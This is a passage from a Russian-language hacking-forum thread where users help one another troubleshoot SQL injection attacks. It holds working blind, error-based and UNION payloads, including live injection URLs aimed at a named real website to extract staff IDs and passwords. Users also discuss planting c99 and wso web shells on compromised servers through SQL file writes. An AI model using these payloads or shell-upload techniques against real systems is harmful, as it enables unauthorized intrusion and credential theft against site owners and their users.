Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Запрос имеет вид, дальше не крутил

    6' and if(ascii(substring((database()),5,1))<115,BENCHMARK(829806,MD5(0x41)),0) and 'x'='x
     
  2. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Cтолкнулся с проблемой.

    Залил минишелл через скулю с file_priv

    пытаюсь залиться нормально.

    Include - неработает
    copy - неработает
    file_put_contents - не работает

    wget и curl тодже не работают
    wget создает пустые файлы curl вообще ничего не создает.

    Возможно едо в кривости рук.
    Но поскажите ещё функции чтоли через которые можно скопировать код шелла с другого сервера в файл.
     
  3. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    php 4 ветки phpinfo с xss :D

    смог заинклудить c99 а wso никак не хочет выскаквает ошибка синтаксиса какаято.
     
  4. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    From a “-- ” sequence to the end of the line. In MySQL, the “-- ” (double-dash) comment style requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on).

    ХАМЕНА, Вы пишете бред: white + space это так же " "
     
    #23424 Strilo4ka, 25 Jul 2014
    Last edited: 25 Jul 2014
  5. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    Что за такой тупой ответ, незачот(

    Просто же можно написать, что ошибка синтаксиса через то, что таблица скорее в другой БД.
     
    1 person likes this.
  6. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    63
    Reputations:
    34
    blink error based inj,
    таблицы и колонки достаются нормально, но при попытке достать даные, говорит что некоторые поля несуществуют "Unknown column 'users.user_name' in 'field list'"
    запрос выда
    Code:
    ' or 1+1=0 and (select 1 from(select count(*),concat((select (select
    (SELECT concat(0x7e,0x27,cast(users.user_name as char),0x27,0x7e) FROM `mydb`.users LIMIT 0,1) ) from
    information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 -- 
    users
    id
    user_name
    password
    role
    userID
    email
    passwd
    loginEnabled
    screenName
    firstName

    Из всех полей выводит только пассворд. Когда пробую вывести что-то другое Unknown column '' in 'field list' ...
    Помогите, пожалуйста.
     
  7. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    del. обновлено.
     
    #23427 madhatter, 26 Jul 2014
    Last edited: 26 Jul 2014
  8. GAiN

    GAiN Elder - Старейшина

    Joined:
    2 Apr 2011
    Messages:
    2,528
    Likes Received:
    166
    Reputations:
    99
    куда лучше записывать значения конфигураций php скрипта, в базу из файлов или в mysql ? объём маленький
    например с точки зрения безопасности, бывают sql инъекции, а к файловой базе тоже могут применяться ?
     
  9. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    609
    Reputations:
    1,101
    В файл (не в структуру из 20-50 файлов). Это и практичнее (система с файлом работает быстрее и данные редко изменяются), и удобнее (данные для подключения к базе все равно придется где-то хранить).

    Многое зависит от того, какие именно данные вы собираетесь хранить, и как с ними работать.

    wkar
    , Может быть вы, как и billybonse взяли имя БД из database(), а не из TABLE_SCHEMA? См. ответ ниже.
     
    #23429 randman, 26 Jul 2014
    Last edited: 26 Jul 2014
  10. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    wkar. Путем мыслительных процессов в хайвмайнде было решено, что база mydb в четвертом подзапросе "SELECT concat(0x7e,0x27,cast(users.user_name as char),0x27,0x7e) FROM `mydb`.users LIMIT 0,1" таки имеет таблицу users, которая из указанных имеет только поле password, а приведенный список колонок содержится в таблице users другой базы.

    Совместная идея с XAMEHA.
     
    #23430 madhatter, 26 Jul 2014
    Last edited: 26 Jul 2014
  11. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    63
    Reputations:
    34
    Спасибо большое за помощь, будет возможность проверить - обязательно отпишу.

    2XAMEHA, скорей всего да, спасибо за подсказку.
     
    #23431 wkar, 26 Jul 2014
    Last edited: 26 Jul 2014
  12. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Столкнулся с проблемой
    HTML:
    ...id=-371+Union(Select+1,user(),3,table_name,5,6,7,8,9,10+from+%60information_schema%60.tables)+--+
    поля для вывода присутствуют, данные о таблицах и колонках выводятся. Но при попытке вывести данные с любых других таблиц (основной базы) эти поля остаются пустыми. При неверном построении запроса, вылазиет sql ошибка, так что запросы составляю верно. Какие есть пути вытягивания данных, кроме посимвольного перебора?
     
  13. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Error-based вектор, разумеется. Приведите, пожалуйста, запрос, выдающий пустой ответ.

    Также, в ряде случаев бывает, что классический вывод на страницу раскукоживает верстку и данные не отображаются некоторыми браузерами. Проверьте на всякий случай исходник страницы.
     
    2 people like this.
  14. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    609
    Reputations:
    1,101
    Что значит пустыми? Такого просто не бывает, причина в чем то другом, возможно в последующий обработке этих данных.

    Посмотрите типы полей (COLUMN_TYPE), попробуйте count(*), length(name), hex(name) и т.п. конструкции.
     
    #23434 randman, 28 Jul 2014
    Last edited: 28 Jul 2014
    2 people like this.
  15. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Пустой ответ, например
    HTML:
    id=-371+Union(Select+1,staff_id,3,password,5,6,7,8,9,10+from+staff)+--+

    в исходном коде обнаружил, что отображается полный запрос скрипта

    HTML:
    <!--
    Select p.item_id as product_id,i.name, p.item_number,p.description,p.special,p.price,i.intro_text,i.item_id,c.category_id,Count(*) as rowcount from item i inner join product p on i.item_id = p.item_id inner join item_category ic on i.item_id = ic.item_id inner join category c on c.category_id = ic.category_id inner join (Select * from category where parent = 0) cp on cp.category_id = c.parent Where (1 = 1)  and (p.form_description like '%%' or i.name like '%%') and c.category_id = -371 Union(Select 1,user(),3,password,5,6,7,8,9,10 from staff) --  group by item_id-->
     
  16. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Проблема либо в кодировке, либо в типах данных.

    PHP:
    aes_decrypt(aes_encrypt(column_name,1),1)
    unhex(hex(column_name))
     
    1 person likes this.
  17. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Ничего не помогает(
    Вот примеры обоих запросов, уже самомоу интересно что там) глянете мб :)

    HTML:
    http://bplampsupply.com/search.php?category_id=-371+Union(Select+1,user(),3,column_name,5,6,7,8,9,10+from+%60information_schema%60.columns+where+TABLE_NAME='staff')+--+
    http://www.bplampsupply.com/search.php?category_id=-371+Union(Select+1,staff_id,3,password,5,6,7,8,9,10+from+staff)+--+
     
  18. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    У Вас таблица пустая.

    PHP:
    371+Union(Select+1,user(),3,table_rows,5,6,7,8,9,  10+from+information_schema.tables+where+TABLE_NAME=0x7374616666)+--+
     
  19. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    519
    Likes Received:
    15
    Reputations:
    -4
    Добрый день!
    Помогите с построением запроса
    выводится нормально N у пользователя tt


    Когда хочу вывести пользователя root
    выводится ошибка
    Обнаружены слудующие ошибки: Subquery returns more than 1 row

    Подскажите как правильно составить запрос для вывода нужной инфы.

    ------------
    Так же пробовал сделать заливку файла через скуль - опять такие не нравится((
    Выводится ошибка:
    Обнаружены слудующие ошибки: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `' at line 1



    так выводится
    Обнаружены слудующие ошибки: Subquery returns more than 1 row
     
    #23439 Evil_Genius, 31 Jul 2014
    Last edited: 31 Jul 2014
  20. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    609
    Reputations:
    1,101
    Заливка выполняется без подзапросов. См. статьи по SQL-инъекциям.

    Живой пример: https://forum.antichat.net/showthread.php?p=3741323#post3741323
    PHP:
    WHERE user='root' LIMIT 1
    В таблице mysql.user несколько записей, где user='root'. Обычно у них разные хосты (localhost, 127.0.0.1, ::1, site.com, ...).
     
    #23440 randman, 31 Jul 2014
    Last edited: 31 Jul 2014
Loading...
Thread Status:
Not open for further replies.